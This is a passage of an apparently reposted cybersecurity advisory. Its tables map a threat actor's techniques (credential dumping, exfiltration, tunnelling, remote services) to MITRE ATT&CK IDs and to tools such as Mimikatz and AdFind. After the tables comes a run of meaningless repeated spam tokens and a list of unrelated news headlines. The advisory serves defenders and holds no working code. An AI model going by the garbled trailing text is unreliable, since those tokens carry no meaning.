Search Open Technical Databases | T1596 | The actors search freely available technical databases for information about victims that can be used during targeting. |
Technique Title | ID | Use |
---|---|---|
OS Credential Dumping | T1003 | The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. |
Exfiltration Over Alternative Protocol | T1048 | The actors steal data by exfiltrating it over a different protocol than that of the existing command and control channel. |
Proxy | T1090 | The actors use a connection proxy to direct network traffic between systems or act as intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. |
Archive Collected Data | T1560 | The actors compress and/or encrypt data that is collected prior to exfiltration. |
Protocol Tunneling | T1572 | The actors tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. |
Develop Capabilities: Malware | T1587.001 | The actors develop malware and malware components that can be used during targeting. |
Develop Capabilities: Exploits | T1587.004 | The actors develop exploits that can be used during targeting. |
Software Title | ID | Use |
---|---|---|
Mimikatz | S0002 | The actors use a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. |
AdFind | S0552 | The actors use a free command-line query tool that can be used for gathering information from the Active Directory. |
Technique Title | ID | Use |
---|---|---|
Exploit Public-Facing Application | T1190 | The actors attempt to exploit a weakness in an Internet-facing host or system to initially access a network. |
Technique Title | ID | Use |
---|---|---|
Command and Scripting Interpreter | T1059 | The actors abuse command and script interpreters to execute commands, scripts, or binaries. |
Technique Title | ID | Use |
---|---|---|
Obfuscated Files or Information | T1027 | The actors attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its content on the system or in transit. |
Technique Title | ID | Use |
---|---|---|
OS Credential Dumping | T1003 | The actors attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. |
Technique Title | ID | Use |
---|---|---|
Remote Services | T1021 | The actors use valid accounts to log into a service that accepts remote connections, such as telnet, SSH, and VNC. |
Remote Services: SMB/Windows Admin Shares | T1021.002 | The actors use valid accounts to interact with a remote network share using Server Message Block (SMB). |
File and Directory Discovery | T1083 | The actors enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. |
Account Discovery | T1087 | The actors attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. |
Technique Title | ID | Use |
---|---|---|
Application Layer Protocol | T1071 | The actors establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, telnet, DNP3, and Modbus. |
Proxy | T1090 | The actors use a connection proxy to direct network traffic between systems or act as an intermediary for network communications. |
Technique Title | ID | Use |
---|---|---|
Data from Network Shared Drive | T1039 | The actors search network shares on computers they have compromised to find files of interest. |
Exfiltration Over Alternative Protocol | T1048 | The actors steal data by exfiltrating it over a different protocol than that of the existing command and control server. |
Archive Collected Data | T1560 | The actors compress and/or encrypt data that is collected prior to exfiltration. |
Exfiltration Over Web Service | T1567 | The actors use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. |
Source link
lol
njuy67 njuy67 njuy68 njuy68 njuy69 njuy69 njuy70 njuy70 njuy71 njuy71 njuy72 njuy72 njuy73 njuy73 njuy74 njuy74 njuy75 njuy75 njuy76 njuy76 njuy77 njuy77 njuy78 njuy78 njuy79 njuy79 njuy80 njuy80 njuy81 njuy81 njuy82 njuy82 njuy83 njuy83 njuy84 njuy84 njuy85 njuy85 njuy86 njuy86 njuy87 njuy87 njuy88 njuy88 njuy89 njuy89 njuy90 njuy90 njuy91 njuy91 njuy92 njuy92 njuy93 njuy93 njuy94…
Recent Posts
- Arm To Seek Retrial In Qualcomm Case After Mixed Verdict
- Jury Sides With Qualcomm Over Arm In Case Related To Snapdragon X PC Chips
- Equinix Makes Dell AI Factory With Nvidia Available Through Partners
- AMD’s EPYC CPU Boss Seeks To Push Into SMB, Midmarket With Partners
- Fortinet Releases Security Updates for FortiManager | CISA